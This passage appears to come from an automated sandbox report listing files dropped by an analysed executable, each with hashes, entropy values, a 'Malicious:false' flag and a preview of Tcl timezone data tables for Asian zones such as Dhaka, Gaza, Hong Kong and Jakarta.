                                                                                                                                                                                                                              SHA-512:9CA386EF4D812B00C2E63558B81B273F92BBCA98AF304C9FD6FC166210FC4E2F92B769E1D6FB96B670650DC76EFFAD2FC6E39AE12C24B47EAED4E50A2AFAC2D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dhaka)]} {.. LoadTimeZoneFile Asia/Dhaka..}..set TZData(:Asia/Dacca) $TZData(:Asia/Dhaka)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3692
                                                                                                                                                                                                                              Entropy (8bit):3.7832279883701254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:59xu6+RYla5W87rtYV08a7bd+dYV004X7JkX3Q0dzPeP2ua/XAog7jP/xZsNaTvT:8YI5WpVAdVGlkBOLh8X0CkBheIFlR
                                                                                                                                                                                                                              MD5:1D6B2CC38669C0F7378D9A576F10C477
                                                                                                                                                                                                                              SHA1:09A31E6295D9FC39219DFA4FC598B46F55C41180
                                                                                                                                                                                                                              SHA-256:7E577F0F9DA459BA1A325BE95C1FA0DB2C6ECFC1D64CDB73F3ADB09588293BA7
                                                                                                                                                                                                                              SHA-512:A0BBD5CE7883C275BF9752C75BA0C9AF0181046D94D27EFC96EC8823C374BADCB69B2B11D2C4497295E5BC25D5790634C69C6E7185F406F2107A8E16044E670F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Damascus) {.. {-9223372036854775808 8712 0 LMT}.. {-1577931912 7200 0 EET}.. {-1568592000 10800 1 EEST}.. {-1554080400 7200 0 EET}.. {-1537142400 10800 1 EEST}.. {-1522630800 7200 0 EET}.. {-1505692800 10800 1 EEST}.. {-1491181200 7200 0 EET}.. {-1474243200 10800 1 EEST}.. {-1459126800 7200 0 EET}.. {-242265600 10800 1 EEST}.. {-228877200 7200 0 EET}.. {-210556800 10800 1 EEST}.. {-197427600 7200 0 EET}.. {-178934400 10800 1 EEST}.. {-165718800 7200 0 EET}.. {-147398400 10800 1 EEST}.. {-134269200 7200 0 EET}.. {-116467200 10800 1 EEST}.. {-102646800 7200 0 EET}.. {-84326400 10800 1 EEST}.. {-71110800 7200 0 EET}.. {-52704000 10800 1 EEST}.. {-39488400 7200 0 EET}.. {-21168000 10800 1 EEST}.. {-7952400 7200 0 EET}.. {10368000 10800 1 EEST}.. {23583600 7200 0 EET}.. {41904000 10800 1 EEST}.. {55119600 7200 0 EET}.. {73526400 10800 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):364
                                                                                                                                                                                                                              Entropy (8bit):4.412125512631861
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKwiDm2OHEmVFnoHv9vX+Yl7UIFckVVFSQiL/FG/UIvy/Ur9i/Ur97:MB862Y2mdHzdCv9P+Y9vvjeQlP9/9VkK
                                                                                                                                                                                                                              MD5:B5496A038AC230B9D75AA22BB2BE6BDD
                                                                                                                                                                                                                              SHA1:ACFD9C78F803F344272E8E188C41ED969EBADA16
                                                                                                                                                                                                                              SHA-256:BFC4562055CC4355E79F9EFAA580A4C6A658285916159A5D390A0CDA96A97E98
                                                                                                                                                                                                                              SHA-512:AB05D0176DADC1ED03CC526C372B9827A5FA03459E4F4B4365C6CE4B6FBDA043514A9D3FE2DA747159C5A1BC0E07727E6578A101E42B4DB120AF9624368C5FEA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dhaka) {.. {-9223372036854775808 21700 0 LMT}.. {-2524543300 21200 0 HMT}.. {-891582800 23400 0 +0630}.. {-872058600 19800 0 +0530}.. {-862637400 23400 0 +0630}.. {-576138600 21600 0 +06}.. {1230746400 21600 0 +06}.. {1245430800 25200 1 +06}.. {1262278800 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):235
                                                                                                                                                                                                                              Entropy (8bit):4.597480383845617
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKCXeSDm2OHnBGeoH1mpvyvScHTU71avScr:MB862qXbmdHnBvC1SyHHq8Hr
                                                                                                                                                                                                                              MD5:316DDF860FA234621698EB473E558DB7
                                                                                                                                                                                                                              SHA1:35BF955F764555945CF8B314B8E881DAD6CF557B
                                                                                                                                                                                                                              SHA-256:8BC2E0D77AC35B6D63E11B820AC45EC23A4195ED773680C600C772FDF4B953F8
                                                                                                                                                                                                                              SHA-512:D1A8D5F1DAAB7827BDCBC14506AF8681FD1ED94C6101CC4A3C8CC2A76EA7D3649038069158C539A2007A1B0734FBD87DE120415E07A3F08F44417100C95459F5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dili) {.. {-9223372036854775808 30140 0 LMT}.. {-1830414140 28800 0 +08}.. {-879152400 32400 0 +09}.. {199897200 28800 0 +08}.. {969120000 32400 0 +09}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):148
                                                                                                                                                                                                                              Entropy (8bit):4.97292023820863
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKQUMXGm2OHvkdoHsQK23NVsRYovV:SlSWB9eg/2wKQUDm2OHvsoHxVNSN
                                                                                                                                                                                                                              MD5:861BA4A0A71E6C3F71B90074275FD57C
                                                                                                                                                                                                                              SHA1:BC6FC5233340BB19AE4BD0BA563875479AC0A2B9
                                                                                                                                                                                                                              SHA-256:3DB174F1568BC23BF467A3DC7BAF8A2A2952B70653D4DE54F4DB391EC50B6925
                                                                                                                                                                                                                              SHA-512:B187735E0783F299253D9F93E002AEFF131FCCA50FB3E04CF0545B334B051D5ED978108A47C6957B608F5F93ED4CC3D69751FE0F40413719EE1C0440CD49AC76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dubai) {.. {-9223372036854775808 13272 0 LMT}.. {-1577936472 14400 0 +04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):820
                                                                                                                                                                                                                              Entropy (8bit):3.969189280047274
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5we3dJvOt81FCuLqecDngO6jPvTpYy5T4TiFGDr:5BvdJqxiF0uGr
                                                                                                                                                                                                                              MD5:9ABD0ECB5F3E738F49CDD1F81C9FF1A4
                                                                                                                                                                                                                              SHA1:46B68C7BBD1BE9791B00128A5129AA3668435C93
                                                                                                                                                                                                                              SHA-256:550DB44595F59D0F151BE4AF70D6FECE20580AB687EF45DE2A0A75FB2515AC80
                                                                                                                                                                                                                              SHA-512:67E2B0EF216D509C4B6DD367519E0A733E54A7CA767D5F7960715E8056E61B7B633C7516D568544F55C9277E90412C1443B822C6EED3341C01F1BD9AA9476FA1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dushanbe) {.. {-9223372036854775808 16512 0 LMT}.. {-1441168512 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 21600 1 +06}.. {684363600 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7597
                                                                                                                                                                                                                              Entropy (8bit):3.7170041442081203
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:G3pv/7V6Aj8aZaNlK0UpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:G3v/AaaivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:F8E4BA3E260452AE13CF234E60149A62
                                                                                                                                                                                                                              SHA1:8DDB08E2FDEEF6539EE0C0038B166908BFED16CD
                                                                                                                                                                                                                              SHA-256:8CFE85C48FC22033411432F8B75EE4C097A5D84897698CB1AFD5AB51C47FF5A3
                                                                                                                                                                                                                              SHA-512:487177411FB7E9F83AB9AAD84B685322B13A85784D4F90BB9C30F57BFAA6A9298E5C4F36C97444DE1117E51F85A62DC639D08B405460D071C2B29C898553E9A3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Famagusta) {.. {-9223372036854775808 8148 0 LMT}.. {-1518920148 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {622587
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8427
                                                                                                                                                                                                                              Entropy (8bit):3.7494839792487094
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NyHSd2XK1GbJFp3gP0nPVl8dcqU/8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXaP:NyyIgGbJv3dPAD7c1FoMpHu3Ky3p
                                                                                                                                                                                                                              MD5:DEB2D261D6885CD83054391D010DE6AD
                                                                                                                                                                                                                              SHA1:5779B343F4EB2BC75613C593E2FA3A026857F940
                                                                                                                                                                                                                              SHA-256:A1823EDA63434ACF1A37B3A781A783CFEB6BB4CC53ED0469BB685834837F2289
                                                                                                                                                                                                                              SHA-512:D024B2D324D981A6792127551B0D466EAFFC5294C84CB5752A71E5267FB2E9162E7EFAED5A5CA3B06BBAD285F62BF955B0EF86DD39307EE5F935FC601F4EEEFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Gaza) {.. {-9223372036854775808 8272 0 LMT}.. {-2185409872 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-16580
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.86422571961583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKwHp4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKi4wKU
                                                                                                                                                                                                                              MD5:1BCCB3578FADE993EE8B2C11EAC06CD8
                                                                                                                                                                                                                              SHA1:CAEAB714E014CD5040C44E4603708B97BC0B03D4
                                                                                                                                                                                                                              SHA-256:12811A7944B892E3D1C0B4B09057CC1899F28081B3CD47FFD248BA49BA308AF0
                                                                                                                                                                                                                              SHA-512:1D791DC0E8F45359366DF33C2C337688D2E0E972A90F038733B840D28585505AEF542DDBAD014C9EA8C252048A588CD017DD67A84545A81EDB7C17E3B2E65092
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Harbin) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8402
                                                                                                                                                                                                                              Entropy (8bit):3.7520828858184325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:fXSd2XK1GbJFp3gP0nPVl8dcqUZ8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXa4a:fiIgGbJv3dPADPc1FoMpHu3Ky3p
                                                                                                                                                                                                                              MD5:6F176787C7FC5764A63719F0041690BA
                                                                                                                                                                                                                              SHA1:C292A8CEA597D7FD9E2D071AB7AE93E7ABCA21A5
                                                                                                                                                                                                                              SHA-256:732CAA355542C8781C61FC8F5265EBFC59C8CC24E78D01011E1E3256E6B34DC7
                                                                                                                                                                                                                              SHA-512:EE8F39A3D65D75E14B59B4D9CCB27894210CA269E82A7AC7F98BE67764688A8895EBB9C1ACEAB4C1B368B4F1BC5AFCB34E8866CEDFD91232926DF47517096513
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hebron) {.. {-9223372036854775808 8423 0 LMT}.. {-2185410023 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):395
                                                                                                                                                                                                                              Entropy (8bit):4.431055857167822
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862RLmdHneCvhYC5sF/p+zHHviViksF/dMUYPsF/RQ9EsV:5de3vhd5sFR+znv2vsFlM/PsFVsV
                                                                                                                                                                                                                              MD5:A49A3D55C1E10A37125C51F9C6363868
                                                                                                                                                                                                                              SHA1:7C1B5D44643ADC3F02681F6379E82C3F4512F0C1
                                                                                                                                                                                                                              SHA-256:D8A19C70BE5A9AE1E6091DC8FD03D7719110D1F3D78786C91D5BD0949FB5A428
                                                                                                                                                                                                                              SHA-512:804C44E51BB9E93B156B0CB4CB125651003B3C42D65334A052BE149734221315CC75D4FBDE34F62DFC102F1A9C968D1C9B573839C7ECBF7397B61BD90E530B20
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ho_Chi_Minh) {.. {-9223372036854775808 25590 0 LMT}.. {-2004073590 25590 0 PLMT}.. {-1851577590 25200 0 +07}.. {-852105600 28800 0 +08}.. {-782643600 32400 0 +09}.. {-767869200 25200 0 +07}.. {-718095600 28800 0 +08}.. {-457776000 25200 0 +07}.. {-315648000 28800 0 +08}.. {171820800 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2226
                                                                                                                                                                                                                              Entropy (8bit):4.0055033036300145
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Ze9l9Pm4yoHtTYJJIX1Zcp6GS0j1SPQpP6gPE8fTZIPNYQGm75st/nQdwi9:DyaoTcwQt6EsQTng
                                                                                                                                                                                                                              MD5:26BCBBA28AE34FE3CF7D17EF4C6B69C8
                                                                                                                                                                                                                              SHA1:5324DEA8E7965C66650E7B4769EFA1297B508486
                                                                                                                                                                                                                              SHA-256:EE9A6997BC1AAD4A8FA95DB312774C3F37FBB895549230C30FC66C02CC170EB6
                                                                                                                                                                                                                              SHA-512:54594CD18838B4A8947EBB5BDE2415727CC127CF79AEC98FC0F5D5A32F68EEAF4E079853239DE9F753CE90F18EFD55AE51FC43D64E313666CEA0EF8AC93BF065
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hong_Kong) {.. {-9223372036854775808 27402 0 LMT}.. {-2056690800 28800 0 HKT}.. {-900910800 32400 1 HKST}.. {-891579600 30600 1 HKWT}.. {-884248200 32400 0 JST}.. {-761209200 28800 0 HKT}.. {-747907200 32400 1 HKST}.. {-728541000 28800 0 HKT}.. {-717049800 32400 1 HKST}.. {-697091400 28800 0 HKT}.. {-683785800 32400 1 HKST}.. {-668061000 28800 0 HKT}.. {-654755400 32400 1 HKST}.. {-636611400 28800 0 HKT}.. {-623305800 32400 1 HKST}.. {-605161800 28800 0 HKT}.. {-591856200 32400 1 HKST}.. {-573712200 28800 0 HKT}.. {-559801800 32400 1 HKST}.. {-541657800 28800 0 HKT}.. {-528352200 32400 1 HKST}.. {-510211800 28800 0 HKT}.. {-498112200 32400 1 HKST}.. {-478762200 28800 0 HKT}.. {-466662600 32400 1 HKST}.. {-446707800 28800 0 HKT}.. {-435213000 32400 1 HKST}.. {-415258200 28800 0 HKT}.. {-403158600 32400 1 HKST}.. {-383808600 28800 0 HKT
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1583
                                                                                                                                                                                                                              Entropy (8bit):3.7521760184466206
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5x3LecCvgsFFFKOksF8FpsF71FQnsFNFxhsFlF6sFaFasFZFisF8GF5sFKLFAZsZ:5FqKVx8Cq9f/y2L
                                                                                                                                                                                                                              MD5:A77140A0D8C2D3E2993E4BA7CADFB4C6
                                                                                                                                                                                                                              SHA1:AE3586264A86D42F578D4B0F7A30C9BE6047EAB1
                                                                                                                                                                                                                              SHA-256:CA88A45E954A9854C680B399E69E4858BF5E861FABFADC19D62D97B734B25415
                                                                                                                                                                                                                              SHA-512:05EA9D903EEC755F799B7C2399ED933245A5AE3A594648FE37AF1CE7699AE499B4ED159F428D91259D80BC9AF5117F2DA055A506AED94E5281C38B7AFF69C6FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hovd) {.. {-9223372036854775808 21996 0 LMT}.. {-2032927596 21600 0 +06}.. {252439200 25200 0 +07}.. {417978000 28800 1 +07}.. {433785600 25200 0 +07}.. {449600400 28800 1 +07}.. {465321600 25200 0 +07}.. {481050000 28800 1 +07}.. {496771200 25200 0 +07}.. {512499600 28800 1 +07}.. {528220800 25200 0 +07}.. {543949200 28800 1 +07}.. {559670400 25200 0 +07}.. {575398800 28800 1 +07}.. {591120000 25200 0 +07}.. {606848400 28800 1 +07}.. {622569600 25200 0 +07}.. {638298000 28800 1 +07}.. {654624000 25200 0 +07}.. {670352400 28800 1 +07}.. {686073600 25200 0 +07}.. {701802000 28800 1 +07}.. {717523200 25200 0 +07}.. {733251600 28800 1 +07}.. {748972800 25200 0 +07}.. {764701200 28800 1 +07}.. {780422400 25200 0 +07}.. {796150800 28800 1 +07}.. {811872000 25200 0 +07}.. {828205200 28800 1 +07}.. {843926400 25200 0 +07}.. {859654800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2089
                                                                                                                                                                                                                              Entropy (8bit):3.7296034934492694
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5PZy4DdOKStci4KjXoYjoSvfQJWE00dtT43kgiTskNrrBizhzRBqY3M:Py2/svfraBGfgP
                                                                                                                                                                                                                              MD5:C9F7AC464970567E5C38CB01ED2297AE
                                                                                                                                                                                                                              SHA1:453718BACCAE3FACD761AF22CA5875185478ADDD
                                                                                                                                                                                                                              SHA-256:61BAAAD6315FFBDAED6F266880165B06ECCAF72F660B7FB01C8B654F3952D68E
                                                                                                                                                                                                                              SHA-512:72044EFAE262CC12974F2DE2AAF06AC4C31BE73071ACD53DDC6B8D8BFC6FBDF937EC03DC881901F730659BDE662FBCFC76C57B2C086DAA97F160530464FBA7C6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Irkutsk) {.. {-9223372036854775808 25025 0 LMT}.. {-2840165825 25025 0 IMT}.. {-1575874625 25200 0 +07}.. {-1247554800 28800 0 +09}.. {354902400 32400 1 +09}.. {370710000 28800 0 +08}.. {386438400 32400 1 +09}.. {402246000 28800 0 +08}.. {417974400 32400 1 +09}.. {433782000 28800 0 +08}.. {449596800 32400 1 +09}.. {465328800 28800 0 +08}.. {481053600 32400 1 +09}.. {496778400 28800 0 +08}.. {512503200 32400 1 +09}.. {528228000 28800 0 +08}.. {543952800 32400 1 +09}.. {559677600 28800 0 +08}.. {575402400 32400 1 +09}.. {591127200 28800 0 +08}.. {606852000 32400 1 +09}.. {622576800 28800 0 +08}.. {638301600 32400 1 +09}.. {654631200 28800 0 +08}.. {670356000 25200 0 +08}.. {670359600 28800 1 +08}.. {686084400 25200 0 +07}.. {695761200 28800 0 +09}.. {701805600 32400 1 +09}.. {717530400 28800 0 +08}.. {733255200 32400 1 +09}.. {748
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.9013773460609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV0XaDovXHAIgoq3XRFvHRL/2WFK4HB/8QaqXKv:SlSWB9vsM3ymQa2HAIgoQ/HN/2wK4HJa
                                                                                                                                                                                                                              MD5:8A92C690BE27A69D122BFF51479B7B56
                                                                                                                                                                                                                              SHA1:52DB64587A347F34153A51788BDE8C349D966575
                                                                                                                                                                                                                              SHA-256:1F77C4BD27574E1D2066885DEF01806A02D3E444424A219A8EC5C114F89665E5
                                                                                                                                                                                                                              SHA-512:FEDF57C4862B6792A789F339EB1027EC8A8472B01B7D1D0814C419850B9AC03A7B454FDB04D8BECE166E9A8BCAA58B0B461007A6C824B30B1080991A1DB49CCA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Istanbul)]} {.. LoadTimeZoneFile Europe/Istanbul..}..set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                              Entropy (8bit):4.4733192761103515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKcrJfDm2OHATJeoHMaSYov/YSZkc5q/MVSSFFWSyvScH+dMVSSFL+:MB862EJLmdHjCEdOc5aMxaSyHHaMxF6P
                                                                                                                                                                                                                              MD5:C689A1AA9FFE535AEB3AD3D7EDE55172
                                                                                                                                                                                                                              SHA1:0520FC9A4619FB555A79C5DF2AE82422BF2C5EDA
                                                                                                                                                                                                                              SHA-256:2F39D9F93761B85C254F458317A7DE2B4184BE9459F2193A85C08662E801269A
                                                                                                                                                                                                                              SHA-512:C1034FB2FCFEF201C5362AF21B048B6637A824C5C93D75854CF3807892C772CD4376533E58BFF8D8726F531F43CB231365B8012EBD3C1BECED865D3CD2D6673D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jakarta) {.. {-9223372036854775808 25632 0 LMT}.. {-3231299232 25632 0 BMT}.. {-1451719200 26400 0 +0720}.. {-1172906400 27000 0 +0730}.. {-876641400 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 25200 0 WIB}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):213
